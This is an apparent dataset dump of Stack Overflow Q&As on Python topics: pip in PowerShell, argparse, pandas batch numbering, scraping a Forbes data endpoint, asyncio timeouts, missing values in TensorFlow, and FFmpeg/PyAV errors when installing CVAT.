$ : The term '$' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:1
+ $ pip install python-telegram-bot
+ ~
+ CategoryInfo : ObjectNotFound: ($:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException
I tried but couldn't get it done; can someone help me out?
| how to install pip install python-telegram-bot? | How do I run pip install python-telegram-bot in PyCharm? Please help me, I get this error msg -
$ : The term '$' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:1
+ $ pip install python-telegram-bot
+ ~
+ CategoryInfo : ObjectNotFound: ($:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException
I tried but couldn't get it done; can someone help me out?
| [] | [] | [
"There should be a \"Python Packages\" on the bottom slidebar. It's a convenient way to install packages.\n"
] | [
-1
] | [
"python"
] | stackoverflow_0074602418_python.txt |
Q:
is there a way to have parameters be executed in random order in python cli?
I have a program that takes 3 parameters: volume, weight, and model_path. Currently, I have:
volume = int(args[0])
weight = int(args[1])
model_path = args[2]
so I have to execute it like this: python3 example.py 713 382 model.pkl. I want to be able to do it like this: python3 example.py --weight=500 --volume=437 --model=model.pkl, but in any order (so python3 example.py --volume=3100 --model=model.pkl --weight=472).
I tried
volume = int(args["--volume"])
weight = int(args["--weight"])
model_path = args["--model"]
and it said args could only be type slice or int, not string.
A:
Ignoring the idea of reimplementing the argparse module, just use that module. For example,
import argparse
p = argparse.ArgumentParser()
p.add_argument('--volume', type=int)
p.add_argument('--weight', type=int)
p.add_argument('--model')
args = p.parse_args()
The result will be an instance of argparse.Namespace, which is just a very simple object with attributes associated with each argument you defined. For example, if you specify --weight=500 or --weight 500, then args.weight == 500.
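The three values from the original script then simply become attribute lookups, and any argument order on the command line works:
volume = args.volume
weight = args.weight
model_path = args.model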
| is there a way to have parameters be executed in random order in python cli? | I have a program that takes 3 parameters: volume, weight, and model_path. Currently, I have:
volume = int(args[0])
weight = int(args[1])
model_path = args[2]
so I have to execute it like this: python3 example.py 713 382 model.pkl. I want to be able to do it like this: python3 example.py --weight=500 --volume=437 --model=model.pkl, but in any order (so python3 example.py --volume=3100 --model=model.pkl --weight=472).
I tried
volume = int(args["--volume"])
weight = int(args["--weight"])
model_path = args["--model"]
and it said args could only be type slice or int, not string.
| [
"Ignoring the idea of reimplementing the argparse module, just use that module. For example,\nimport argparse\n\np = argparse.ArgumentParser()\np.add_argument('--volume', type=int)\np.add_argument('--weight', type=int)\np.add_argument('--model')\n\nargs = p.parse_args()\n\nThe result will be an instance of argparse.Namespace, which is just a very simple object with attributes associated with each argument you defined. For example, if you specify --weight=500 or --weight 500, then args.weight == 500.\n"
] | [
1
] | [] | [] | [
"command_line_interface",
"list",
"python",
"python_3.x"
] | stackoverflow_0074602341_command_line_interface_list_python_python_3.x.txt |
Q:
Python code to have batch numbers within a value in a column in dataframe
I have a dataframe like this
Name Age
0 U 20
1 U 20
2 U 20
3 U 18
4 I 45
5 I 68
6 I 8
7 D 7
8 D 6
9 I 89
and I want to use a batch size (say 3) and display another column that increments the batch number starting from 1. Batches never cross different Name values (U, I, D): after batch-size rows within a particular Name, the batch number should increment by 1. The output should look like
Name Age Batch
0 U 20 1
1 U 20 1
2 U 20 1
3 U 18 2
4 I 45 3
5 I 68 3
6 I 8 3
7 D 7 4
8 D 6 4
9 I 89 5
any suggestions or references on how to do this ?
I have this piece of code which kinda does the job, but it does not consider the Name column and then increment.
resu['B'] = np.divmod(np.arange(len(resu)),3)[0]+1
The output which I got is like this and this is not desired output as it is not considering Name column
index Name Age B
0 4 I 45 1
1 5 I 68 1
2 6 I 8 1
3 9 I 89 2
4 0 U 20 2
5 1 U 20 2
6 2 U 20 3
7 3 U 18 3
8 7 D 7 3
9 8 D 6 4
Is there any other solution perhaps ?
A:
You can use:
N = 3
# group successive values
group = df['Name'].ne(df['Name'].shift()).cumsum()
# restart group every N times
df['Batch'] = (df.groupby(group)
.cumcount().mod(N)
.eq(0).cumsum()
)
Output:
Name Age Batch
0 U 20 1
1 U 20 1
2 U 20 1
3 U 18 2
4 I 45 3
5 I 68 3
6 I 8 3
7 D 7 4
8 D 6 4
9 I 89 5
| Python code to have batch numbers within a value in a column in dataframe | I have a dataframe like this
Name Age
0 U 20
1 U 20
2 U 20
3 U 18
4 I 45
5 I 68
6 I 8
7 D 7
8 D 6
9 I 89
and I want to use a batch size (say 3) and display another column that increments the batch number starting from 1. Batches never cross different Name values (U, I, D): after batch-size rows within a particular Name, the batch number should increment by 1. The output should look like
Name Age Batch
0 U 20 1
1 U 20 1
2 U 20 1
3 U 18 2
4 I 45 3
5 I 68 3
6 I 8 3
7 D 7 4
8 D 6 4
9 I 89 5
any suggestions or references on how to do this ?
I have this piece of code which kinda does the job, but it does not consider the Name column and then increment.
resu['B'] = np.divmod(np.arange(len(resu)),3)[0]+1
The output which I got is like this and this is not desired output as it is not considering Name column
index Name Age B
0 4 I 45 1
1 5 I 68 1
2 6 I 8 1
3 9 I 89 2
4 0 U 20 2
5 1 U 20 2
6 2 U 20 3
7 3 U 18 3
8 7 D 7 3
9 8 D 6 4
Is there any other solution perhaps ?
| [
"You can use:\nN = 3\n\n# group successive values\ngroup = df['Name'].ne(df['Name'].shift()).cumsum()\n\n# restart group every N times\ndf['Batch'] = (df.groupby(group)\n .cumcount().mod(N)\n .eq(0).cumsum()\n )\n\nOutput:\n Name Age Batch\n0 U 20 1\n1 U 20 1\n2 U 20 1\n3 U 18 2\n4 I 45 3\n5 I 68 3\n6 I 8 3\n7 D 7 4\n8 D 6 4\n9 I 89 5\n\n"
] | [
3
] | [] | [] | [
"dataframe",
"group_by",
"numpy",
"pandas",
"python"
] | stackoverflow_0074601971_dataframe_group_by_numpy_pandas_python.txt |
Q:
Web scrape of forbes website using requests-html
I'm trying to scrape the list from https://www.forbes.com/best-states-for-business/list/#tab:overall
import requests_html
session= requests_html.HTMLSession()
r = session.get("https://www.forbes.com/best-states-for-business/list/#tab:overall")
r.html.render()
body=r.text.find('#list-table-body')
print(body)
This returns -1, not the table content. How can I get the actual table content?
A:
Data is loaded dynamically from external source via API and You can grab the required data using requests module only then store via pandas DataFrame.
import pandas as pd
import requests
headers = {'user-agent':'Mozilla/5.0'}
url = 'https://www.forbes.com/ajax/list/data?year=2019&uri=best-states-for-business&type=place'
r= requests.get(url,headers=headers)
df = pd.DataFrame(r.json())
print(df)
Output:
position rank name uri ... regulatoryEnvironment economicClimate growthProspects lifeQuality
0 1 1 North Carolina nc ... 1 13 13 16
1 2 2 Texas tx ... 21 4 1 15
2 3 3 Utah ut ... 6 8 7 9
3 4 4 Virginia va ... 3 20 24 1
4 5 5 Florida fl ... 7 3 5 18
5 6 6 Georgia ga ... 9 7 11 23
6 7 7 Tennessee tn ... 4 11 14 29
7 8 8 Washington wa ... 29 6 8 30
8 9 9 Colorado co ... 19 2 4 21
9 10 10 Idaho id ... 8 10 2 24
10 11 11 Nebraska ne ... 2 28 36 19
11 12 12 Indiana in ... 5 25 25 7
12 13 13 Nevada nv ... 14 14 6 48
13 14 14 South Dakota sd ... 13 39 20 28
14 15 15 Minnesota mn ... 16 16 27 3
15 16 16 South Carolina sc ... 17 15 12 39
16 17 17 Iowa ia ... 11 36 35 10
17 18 18 Arizona az ... 18 12 3 35
18 19 19 Massachusetts ma ... 37 5 15 4
19 20 20 Oregon or ... 36 9 9 38
20 21 21 Wisconsin wi ... 10 19 37 8
21 22 22 Missouri mo ... 25 26 18 17
22 23 23 Delaware de ... 42 37 19 43
23 24 24 Oklahoma ok ... 15 31 33 31
24 25 25 New Hampshire nh ... 32 21 22 22
25 26 26 North Dakota nd ... 22 45 26 42
26 27 27 Pennsylvania pa ... 35 23 40 12
27 28 28 New York ny ... 34 18 21 14
28 29 29 Ohio oh ... 26 22 44 2
29 30 30 Montana mt ... 28 35 17 45
30 31 31 California ca ... 40 1 10 27
31 32 32 Wyoming wy ... 12 49 23 36
32 33 33 Arkansas ar ... 20 33 39 41
33 34 34 Maryland md ... 41 27 29 26
34 35 35 Michigan mi ... 22 17 41 13
35 36 36 Kansas ks ... 24 32 42 32
36 37 37 Illinois il ... 39 30 45 11
37 38 38 Kentucky ky ... 33 41 34 25
38 39 39 New Jersey nj ... 49 29 30 5
39 40 40 Alabama al ... 27 38 31 44
40 41 41 Rhode Island ri ... 44 40 32 20
41 42 42 Mississippi ms ... 30 46 47 37
42 43 43 Connecticut ct ... 43 42 48 6
43 44 44 Maine me ... 48 34 28 34
44 45 45 Vermont vt ... 45 43 38 33
45 46 46 Louisiana la ... 47 47 46 47
46 47 47 Hawaii hi ... 38 24 49 40
47 48 48 New Mexico nm ... 46 44 15 49
48 49 49 West Virginia wv ... 50 48 50 46
49 50 50 Alaska ak ... 31 50 43 50
[50 rows x 15 columns]
| Web scrape of forbes website using requests-html | I'm trying to scrape the list from https://www.forbes.com/best-states-for-business/list/#tab:overall
import requests_html
session= requests_html.HTMLSession()
r = session.get("https://www.forbes.com/best-states-for-business/list/#tab:overall")
r.html.render()
body=r.text.find('#list-table-body')
print(body)
This returns -1, not the table content. How can I get the actual table content?
| [
"Data is loaded dynamically from external source via API and You can grab the required data using requests module only then store via pandas DataFrame.\nimport pandas as pd\nimport requests\n\nheaders = {'user-agent':'Mozilla/5.0'}\nurl = 'https://www.forbes.com/ajax/list/data?year=2019&uri=best-states-for-business&type=place'\nr= requests.get(url,headers=headers)\n\ndf = pd.DataFrame(r.json())\nprint(df)\n\nOutput:\n position rank name uri ... regulatoryEnvironment economicClimate growthProspects lifeQuality\n0 1 1 North Carolina nc ... 1 13 13 16 \n1 2 2 Texas tx ... 21 4 1 15 \n2 3 3 Utah ut ... 6 8 7 9 \n3 4 4 Virginia va ... 3 20 24 1 \n4 5 5 Florida fl ... 7 3 5 18 \n5 6 6 Georgia ga ... 9 7 11 23 \n6 7 7 Tennessee tn ... 4 11 14 29 \n7 8 8 Washington wa ... 29 6 8 30 \n8 9 9 Colorado co ... 19 2 4 21 \n9 10 10 Idaho id ... 8 10 2 24 \n10 11 11 Nebraska ne ... 2 28 36 19 \n11 12 12 Indiana in ... 5 25 25 7 \n12 13 13 Nevada nv ... 14 14 6 48 \n13 14 14 South Dakota sd ... 13 39 20 28 \n14 15 15 Minnesota mn ... 16 16 27 3 \n15 16 16 South Carolina sc ... 17 15 12 39 \n16 17 17 Iowa ia ... 11 36 35 10 \n17 18 18 Arizona az ... 18 12 3 35 \n18 19 19 Massachusetts ma ... 37 5 15 4 \n19 20 20 Oregon or ... 36 9 9 38 \n20 21 21 Wisconsin wi ... 10 19 37 8 \n21 22 22 Missouri mo ... 25 26 18 17 \n22 23 23 Delaware de ... 42 37 19 43 \n23 24 24 Oklahoma ok ... 15 31 33 31 \n24 25 25 New Hampshire nh ... 32 21 22 22 \n25 26 26 North Dakota nd ... 22 45 26 42 \n26 27 27 Pennsylvania pa ... 35 23 40 12 \n27 28 28 New York ny ... 34 18 21 14 \n28 29 29 Ohio oh ... 26 22 44 2 \n29 30 30 Montana mt ... 28 35 17 45 \n30 31 31 California ca ... 40 1 10 27 \n31 32 32 Wyoming wy ... 12 49 23 36 \n32 33 33 Arkansas ar ... 20 33 39 41 \n33 34 34 Maryland md ... 41 27 29 26 \n34 35 35 Michigan mi ... 22 17 41 13 \n35 36 36 Kansas ks ... 24 32 42 32 \n36 37 37 Illinois il ... 39 30 45 11 \n37 38 38 Kentucky ky ... 33 41 34 25 \n38 39 39 New Jersey nj ... 49 29 30 5 \n39 40 40 Alabama al ... 27 38 31 44 \n40 41 41 Rhode Island ri ... 44 40 32 20 \n41 42 42 Mississippi ms ... 30 46 47 37 \n42 43 43 Connecticut ct ... 43 42 48 6 \n43 44 44 Maine me ... 48 34 28 34 \n44 45 45 Vermont vt ... 45 43 38 33 \n45 46 46 Louisiana la ... 47 47 46 47 \n46 47 47 Hawaii hi ... 38 24 49 40 \n47 48 48 New Mexico nm ... 46 44 15 49 \n48 49 49 West Virginia wv ... 50 48 50 46 \n49 50 50 Alaska ak ... 31 50 43 50 \n\n[50 rows x 15 columns]\n\n"
] | [
1
] | [] | [] | [
"python",
"python_requests_html",
"web_scraping"
] | stackoverflow_0074600929_python_python_requests_html_web_scraping.txt |
Q:
check the boolean value of json Python
Hello, I am pretty new to working with AWS and SF. I am trying to send information, and I need to check every entry in the list of JSON objects I get back.
I have the next json list:
here...b'[{
"id": "xxxx",
"success": true,
"errors": []
},
{
"id": "yyyy",
"success": true,
"errors": []
}
]'
and in my lambda I do the next check:
response = requests.request("PATCH", url, headers=headers, data=body)
print('here...'+str(response.content))
if response.status_code == 200:
for iResult in response.content.b["success"]:
if iResult["success"] == false:
raise Exception('Error. Check SF size fields...')
I want to make sure that every 'success' in every JSON object equals True, and if any is false, to raise an Exception. So I made a loop to iterate over each JSON object, but the problem is that I do not know how to access the JSON correctly. What is confusing me is the " b' " in the JSON I print.
Could anybody help me?
Thanks
A:
The b at the beginning means you have bytes instead of a string, so you first have to convert your response content into Python objects (here a list of dictionaries, the Python equivalent of JSON) so that you can access the data by key. Luckily that's easy to do from a requests response with
json_data = response.json()
for sub_dict in json_data:
    if sub_dict["success"] is False:
        raise ValueError("Check SF size fields...")
More about requests.response: https://requests.readthedocs.io/en/latest/api/#requests.Response
| check the boolean value of json Python | Hello, I am pretty new to working with AWS and SF. I am trying to send information, and I need to check every entry in the list of JSON objects I get back.
I have the next json list:
here...b'[{
"id": "xxxx",
"success": true,
"errors": []
},
{
"id": "yyyy",
"success": true,
"errors": []
}
]'
and in my lambda I do the next check:
response = requests.request("PATCH", url, headers=headers, data=body)
print('here...'+str(response.content))
if response.status_code == 200:
for iResult in response.content.b["success"]:
if iResult["success"] == false:
raise Exception('Error. Check SF size fields...')
I want to make sure that every 'success' in every JSON object equals True, and if any is false, to raise an Exception. So I made a loop to iterate over each JSON object, but the problem is that I do not know how to access the JSON correctly. What is confusing me is the " b' " in the JSON I print.
Could anybody help me?
Thanks
| [
"The b in the beginning means you have bytes, instead of a string, meaning you first have to convert your response content into a dictionary (think of a python term for a json) so that you can access the data in your response by their keys. Luckily that's easy to from a requests response with\njson_data = response.json()\nfor sub_dict in json_data:\n if sub_dict [\"success\"] is False:\n raise ValueError(\"Check SF size fields...\")\n\nMore about requests.response: https://requests.readthedocs.io/en/latest/api/#requests.Response\n"
] | [
0
] | [] | [] | [
"amazon_web_services",
"json",
"loops",
"python",
"salesforce"
] | stackoverflow_0074602226_amazon_web_services_json_loops_python_salesforce.txt |
Q:
Python Asyncio wait_for decorator
I am trying to write a decorator that calls asyncio.wait_for on the decorated function - the goal is to set a time limit on the decorated function. I expect the decorated function to stop running after time_limit but it does not. The decorator is being called fine but the code just sleeps for 30 seconds instead of being interrupted. Any ideas what I'm doing wrong?
def await_time_limit(time_limit):
def Inner(func):
async def wrapper(*args, **kwargs):
return await asyncio.wait_for(func(*args, **kwargs), time_limit)
return wrapper
return Inner
@await_time_limit(5)
async def whatever
time.sleep(30) # this runs to the full 30 seconds and not stopped after 5
end
A:
As we can see in this example here, the problem arises from using time.sleep not asyncio.sleep, since time.sleep will block the thread. You need to be careful not to have any blocking code
import asyncio
import time
def await_time_limit(time_limit):
def Inner(func):
async def wrapper(*args, **kwargs):
return await asyncio.wait_for(func(*args, **kwargs), time_limit)
return wrapper
return Inner
@await_time_limit(5)
async def asleep():
await asyncio.sleep(30) # this runs for only 5 seconds
@await_time_limit(5)
async def ssleep():
time.sleep(30) # this runs to the full 30 seconds and not stopped after 5
t1 = time.time()
await asleep()
t2 = time.time()
print(t2-t1) # 5.018370866775513
t1 = time.time()
await ssleep()
t2 = time.time()
print(t2-t1) # 30.00193428993225
| Python Asyncio wait_for decorator | I am trying to write a decorator that calls asyncio.wait_for on the decorated function - the goal is to set a time limit on the decorated function. I expect the decorated function to stop running after time_limit but it does not. The decorator is being called fine but the code just sleeps for 30 seconds instead of being interrupted. Any ideas what I'm doing wrong?
def await_time_limit(time_limit):
def Inner(func):
async def wrapper(*args, **kwargs):
return await asyncio.wait_for(func(*args, **kwargs), time_limit)
return wrapper
return Inner
@await_time_limit(5)
async def whatever
time.sleep(30) # this runs to the full 30 seconds and not stopped after 5
end
| [
"As we can see in this example here, the problem arises from using time.sleep not asyncio.sleep, since time.sleep will block the thread. You need to be careful not to have any blocking code\nimport asyncio\nimport time\n\n\ndef await_time_limit(time_limit):\n def Inner(func):\n async def wrapper(*args, **kwargs):\n return await asyncio.wait_for(func(*args, **kwargs), time_limit)\n return wrapper\n return Inner\n\n\n@await_time_limit(5)\nasync def asleep():\n await asyncio.sleep(30) # this runs for only 5 seconds\n\n\n@await_time_limit(5)\nasync def ssleep():\n time.sleep(30) # this runs to the full 30 seconds and not stopped after 5\n\n\nt1 = time.time()\nawait asleep()\nt2 = time.time()\nprint(t2-t1) # 5.018370866775513\n\n\nt1 = time.time()\nawait ssleep()\nt2 = time.time()\nprint(t2-t1) # 30.00193428993225\n\n"
] | [
1
] | [] | [] | [
"python",
"python_asyncio",
"python_decorators"
] | stackoverflow_0074602321_python_python_asyncio_python_decorators.txt |
Q:
Can Tensorflow Machine Learning Model train data that has None values?
I'm wondering if a Tensorflow machine learning model can train on data that has None values?
I have a Data table with multiple data (in each row) and in some of these rows, there are columns with None/Null value:
| Column A | Column B | Column C |
|----------|----------|----------|
| 50       | None     | 2        |
| 2        | 100      | None     |
Or should I not have None values in my dataset and instead set all of them to 0? But then I think 0 is not a really good representation of the value because the reason why there are None values is simply because I couldn't get data for them. But 0 kind of means like a value...
A:
TensorFlow is no different to any other ML solution you could find - strictly speaking, no, it cannot learn from Nones and it's your responsibility to encode them somehow as a numerical value. It could be any value you find reasonable - I would recommend you to read through https://scikit-learn.org/stable/modules/impute.html, for example.
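For example, a minimal sketch with scikit-learn's SimpleImputer (add_indicator=True also appends a "was missing" column, which addresses the worry that a filled-in 0 looks like a real measurement):
import numpy as np
from sklearn.impute import SimpleImputer

X = np.array([[50.0, np.nan, 2.0],
              [2.0, 100.0, np.nan]])

imputer = SimpleImputer(strategy="mean", add_indicator=True)
X_filled = imputer.fit_transform(X)  # NaNs replaced by column means, plus missingness flags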
A:
You are trying to avoid Imputation. Most models don't support this, but some implementations of "Naive Bayes" and "k-Nearest Neighbor" can do it apparently. Maybe this article can help you.
| Can Tensorflow Machine Learning Model train data that has None values? | I'm wondering if a Tensorflow machine learning model can train on data that has None values?
I have a Data table with multiple data (in each row) and in some of these rows, there are columns with None/Null value:
| Column A | Column B | Column C |
|----------|----------|----------|
| 50       | None     | 2        |
| 2        | 100      | None     |
Or should I not have None values in my dataset and instead set all of them to 0? But then I think 0 is not a really good representation of the value because the reason why there are None values is simply because I couldn't get data for them. But 0 kind of means like a value...
| [
"TensorFlow is no different to any other ML solution you could find - strickly speaking, no, it cannot learn from Nones and its your responsibility to encode them somehow to a numerical value. It could be any value you find reasonable - I would recommend you to read through https://scikit-learn.org/stable/modules/impute.html, for example.\n",
"You are trying to avoid Imputation. Most models don't support this, but some implementations of \"Naive Bayes\" and \"k-Nearest Neighbor\" can do it apparently. Maybe this article can help you.\n"
] | [
0,
0
] | [] | [] | [
"python",
"tensorflow"
] | stackoverflow_0074602128_python_tensorflow.txt |
Q:
CVAT error during installation of development version
I'm trying to install the development version of CVAT according to the official instructions but am struggling at the step of applying requirements.txt:
pip install -r cvat/requirements/development.txt
... which fails with the following error:
Skipping wheel build for av, due to binaries being disabled for it.
Skipping wheel build for datumaro, due to binaries being disabled for it.
Installing collected packages: wrapt, tf-estimator-nightly, termcolor, tensorboard-plugin-wit, Shapely, rules, rope, rjsmin, rcssmin, pytz, pyasn1, patool, mistune, mccabe, libclang, keras, itypes, flatbuffers, entrypoint2, EasyProcess, dj-pagination, diskcache, av, addict, Werkzeug, urllib3, uritemplate, typing-extensions, tqdm, tornado, toml, threadpoolctl, tensorflow-io-gcs-filesystem, tensorboard-data-server, sqlparse, smmap, six, ruamel.yaml.clib, rsa, redis, PyYAML, pyunpack, pyrsistent, pyparsing, pylogbeat, pyjwt, Pygments, pycparser, pyasn1-modules, protobuf, Pillow, oauthlib, numpy, networkx, natsort, MarkupSafe, Markdown, lxml, lazy-object-proxy, kiwisolver, joblib, jmespath, isort, inflection, idna, google-crc32c, gast, fonttools, dnspython, django-extensions, deprecated, defusedxml, cycler, click, charset-normalizer, certifi, cachetools, attrs, asgiref, absl-py, tensorboardX, snakeviz, scipy, ruamel.yaml, rq, requests, python3-openid, python-ldap, python-dateutil, pdf2image, packaging, orderedmultidict, opt-einsum, opencv-python-headless, opencv-python, keras-preprocessing, jsonschema, jinja2, isodate, h5py, grpcio, googleapis-common-protos, google-resumable-media, google-pasta, google-auth, gitdb, Django, cffi, astunparse, astroid, scikit-learn, requests-oauthlib, pylint, pandas, matplotlib, limits, google-api-core, GitPython, furl, djangorestframework, django-sendfile2, django-rq, django-filter, django-cors-headers, django-auth-ldap, django-appconf, cryptography, croniter, coreschema, botocore, azure-core, s3transfer, rq-scheduler, python-logstash-async, pylint-plugin-utils, pycocotools, open3d, msrest, google-cloud-core, google-auth-oauthlib, drf-spectacular, django-rest-auth, django-compressor, coreapi, tensorboard, pylint-django, google-cloud-storage, django-allauth, datumaro, boto3, azure-storage-blob, tensorflow
Running setup.py install for av ... error
error: subprocess-exited-with-error
× Running setup.py install for av did not run successfully.
│ exit code: 1
╰─> [50 lines of output]
running install
/Users/dd/cvat/.env/lib/python3.9/site-packages/setuptools/command/install.py:34: SetuptoolsDeprecationWarning: setup.py install is deprecated. Use build and pip and other standards-based tools.
warnings.warn(
running build
running build_py
creating build
creating build/lib.macosx-12.4-x86_64-cpython-39
creating build/lib.macosx-12.4-x86_64-cpython-39/av
copying av/deprecation.py -> build/lib.macosx-12.4-x86_64-cpython-39/av
copying av/datasets.py -> build/lib.macosx-12.4-x86_64-cpython-39/av
copying av/__init__.py -> build/lib.macosx-12.4-x86_64-cpython-39/av
copying av/__main__.py -> build/lib.macosx-12.4-x86_64-cpython-39/av
creating build/lib.macosx-12.4-x86_64-cpython-39/av/video
copying av/video/__init__.py -> build/lib.macosx-12.4-x86_64-cpython-39/av/video
creating build/lib.macosx-12.4-x86_64-cpython-39/av/codec
copying av/codec/__init__.py -> build/lib.macosx-12.4-x86_64-cpython-39/av/codec
creating build/lib.macosx-12.4-x86_64-cpython-39/av/container
copying av/container/__init__.py -> build/lib.macosx-12.4-x86_64-cpython-39/av/container
creating build/lib.macosx-12.4-x86_64-cpython-39/av/audio
copying av/audio/__init__.py -> build/lib.macosx-12.4-x86_64-cpython-39/av/audio
creating build/lib.macosx-12.4-x86_64-cpython-39/av/subtitles
copying av/subtitles/__init__.py -> build/lib.macosx-12.4-x86_64-cpython-39/av/subtitles
creating build/lib.macosx-12.4-x86_64-cpython-39/av/filter
copying av/filter/__init__.py -> build/lib.macosx-12.4-x86_64-cpython-39/av/filter
creating build/lib.macosx-12.4-x86_64-cpython-39/av/sidedata
copying av/sidedata/__init__.py -> build/lib.macosx-12.4-x86_64-cpython-39/av/sidedata
creating build/lib.macosx-12.4-x86_64-cpython-39/av/data
copying av/data/__init__.py -> build/lib.macosx-12.4-x86_64-cpython-39/av/data
running build_ext
running config
PyAV: 8.0.2 (unknown commit)
Python: 3.9.10 (main, Jun 28 2022, 17:49:16) \n[Clang 13.1.6 (clang-1316.0.21.2.5)]
platform: macOS-12.4-x86_64-i386-64bit
extension_extra:
include_dirs: [b'include']
libraries: []
library_dirs: []
define_macros: []
runtime_library_dirs: []
config_macros:
PYAV_COMMIT_STR="unknown-commit"
PYAV_VERSION=8.0.2
PYAV_VERSION_STR="8.0.2"
Could not find libavformat with pkg-config.
Could not find libavcodec with pkg-config.
Could not find libavdevice with pkg-config.
Could not find libavutil with pkg-config.
Could not find libavfilter with pkg-config.
Could not find libswscale with pkg-config.
Could not find libswresample with pkg-config.
[end of output]
note: This error originates from a subprocess, and is likely not a problem with pip.
error: legacy-install-failure
× Encountered error while trying to install package.
╰─> av
I have already tried the suggested fixes, but no luck:
https://github.com/openvinotoolkit/cvat/issues/4406
Environment:
MacBook Pro (Intel x64)
macOS Monterey (Version 12.4)
(pyenv) Python 3.9.10
What other options could be applied to fix it?
A:
I faced this same problem just last week. I would say the problem is that you are trying to install PyAv without the proper dynamic libraries from FFMPEG. PyAv is just a bunch of Python bindings that connect to binary dynamic libraries on the system. I'm also assuming you are probably on Ubuntu 18.04. The newest FFMPEG version in the standard repository is no good - it's 3.x.
You either have to compile an FFMPEG version equal to or above 4.0 - that is, build it from source and install it with make and make install - or you can add a repository with the binaries you want. I compiled it myself, and it generated all the libraries I needed, so that's what I describe here.
First run ffmpeg on the terminal to make sure you have an FFMPEG version below 4.0. If that's the case, run the following commands. They will download the source code, extract it, compile it and install the files. After that, the Python bindings of PyAv should find the correct libraries and the installation will be able to proceed.
Make sure you have the dependencies:
sudo apt install yasm libvpx. libx264. cmake libavdevice-dev libavfilter-dev libopus-dev libvpx-dev pkg-config libsrtp2-dev libpython3-dev python3-numpy
Then download the sources:
curl https://launchpad.net/ubuntu/+archive/primary/+sourcefiles/ffmpeg/7:4.2.4-1ubuntu0.1/ffmpeg_4.2.4.orig.tar.xz --output ffmpeg_4.2.4
Extract the file:
tar -xf ffmpeg_4.2.4.orig.tar.xz
Enter the directory:
cd ffmpeg-4.2.4/
And compile and install the files:
./configure --disable-static --enable-shared --disable-doc
make
sudo make install
sudo ldconfig
It should now compile and install the dynamic libraries for FFMPEG 4.2.4. Once it finishes, open a NEW terminal and type ffmpeg to verify that a new 4.x version is now available. Then try to install CVAT again; it should work now.
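Since the question is actually about macOS, it may be worth noting (an untested sketch, assuming Homebrew is installed) that the same "Could not find lib... with pkg-config" errors can usually be resolved there by installing FFMPEG and pkg-config via Homebrew instead of compiling from source:
brew install ffmpeg pkg-config
pip install av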
| CVAT error during installation of development version | I'm trying to install development version of CVAT according to official instruction but struggling at the step of requirements.txt applying:
pip install -r cvat/requirements/development.txt
... with following error:
Skipping wheel build for av, due to binaries being disabled for it.
Skipping wheel build for datumaro, due to binaries being disabled for it.
Installing collected packages: wrapt, tf-estimator-nightly, termcolor, tensorboard-plugin-wit, Shapely, rules, rope, rjsmin, rcssmin, pytz, pyasn1, patool, mistune, mccabe, libclang, keras, itypes, flatbuffers, entrypoint2, EasyProcess, dj-pagination, diskcache, av, addict, Werkzeug, urllib3, uritemplate, typing-extensions, tqdm, tornado, toml, threadpoolctl, tensorflow-io-gcs-filesystem, tensorboard-data-server, sqlparse, smmap, six, ruamel.yaml.clib, rsa, redis, PyYAML, pyunpack, pyrsistent, pyparsing, pylogbeat, pyjwt, Pygments, pycparser, pyasn1-modules, protobuf, Pillow, oauthlib, numpy, networkx, natsort, MarkupSafe, Markdown, lxml, lazy-object-proxy, kiwisolver, joblib, jmespath, isort, inflection, idna, google-crc32c, gast, fonttools, dnspython, django-extensions, deprecated, defusedxml, cycler, click, charset-normalizer, certifi, cachetools, attrs, asgiref, absl-py, tensorboardX, snakeviz, scipy, ruamel.yaml, rq, requests, python3-openid, python-ldap, python-dateutil, pdf2image, packaging, orderedmultidict, opt-einsum, opencv-python-headless, opencv-python, keras-preprocessing, jsonschema, jinja2, isodate, h5py, grpcio, googleapis-common-protos, google-resumable-media, google-pasta, google-auth, gitdb, Django, cffi, astunparse, astroid, scikit-learn, requests-oauthlib, pylint, pandas, matplotlib, limits, google-api-core, GitPython, furl, djangorestframework, django-sendfile2, django-rq, django-filter, django-cors-headers, django-auth-ldap, django-appconf, cryptography, croniter, coreschema, botocore, azure-core, s3transfer, rq-scheduler, python-logstash-async, pylint-plugin-utils, pycocotools, open3d, msrest, google-cloud-core, google-auth-oauthlib, drf-spectacular, django-rest-auth, django-compressor, coreapi, tensorboard, pylint-django, google-cloud-storage, django-allauth, datumaro, boto3, azure-storage-blob, tensorflow
Running setup.py install for av ... error
error: subprocess-exited-with-error
× Running setup.py install for av did not run successfully.
│ exit code: 1
╰─> [50 lines of output]
running install
/Users/dd/cvat/.env/lib/python3.9/site-packages/setuptools/command/install.py:34: SetuptoolsDeprecationWarning: setup.py install is deprecated. Use build and pip and other standards-based tools.
warnings.warn(
running build
running build_py
creating build
creating build/lib.macosx-12.4-x86_64-cpython-39
creating build/lib.macosx-12.4-x86_64-cpython-39/av
copying av/deprecation.py -> build/lib.macosx-12.4-x86_64-cpython-39/av
copying av/datasets.py -> build/lib.macosx-12.4-x86_64-cpython-39/av
copying av/__init__.py -> build/lib.macosx-12.4-x86_64-cpython-39/av
copying av/__main__.py -> build/lib.macosx-12.4-x86_64-cpython-39/av
creating build/lib.macosx-12.4-x86_64-cpython-39/av/video
copying av/video/__init__.py -> build/lib.macosx-12.4-x86_64-cpython-39/av/video
creating build/lib.macosx-12.4-x86_64-cpython-39/av/codec
copying av/codec/__init__.py -> build/lib.macosx-12.4-x86_64-cpython-39/av/codec
creating build/lib.macosx-12.4-x86_64-cpython-39/av/container
copying av/container/__init__.py -> build/lib.macosx-12.4-x86_64-cpython-39/av/container
creating build/lib.macosx-12.4-x86_64-cpython-39/av/audio
copying av/audio/__init__.py -> build/lib.macosx-12.4-x86_64-cpython-39/av/audio
creating build/lib.macosx-12.4-x86_64-cpython-39/av/subtitles
copying av/subtitles/__init__.py -> build/lib.macosx-12.4-x86_64-cpython-39/av/subtitles
creating build/lib.macosx-12.4-x86_64-cpython-39/av/filter
copying av/filter/__init__.py -> build/lib.macosx-12.4-x86_64-cpython-39/av/filter
creating build/lib.macosx-12.4-x86_64-cpython-39/av/sidedata
copying av/sidedata/__init__.py -> build/lib.macosx-12.4-x86_64-cpython-39/av/sidedata
creating build/lib.macosx-12.4-x86_64-cpython-39/av/data
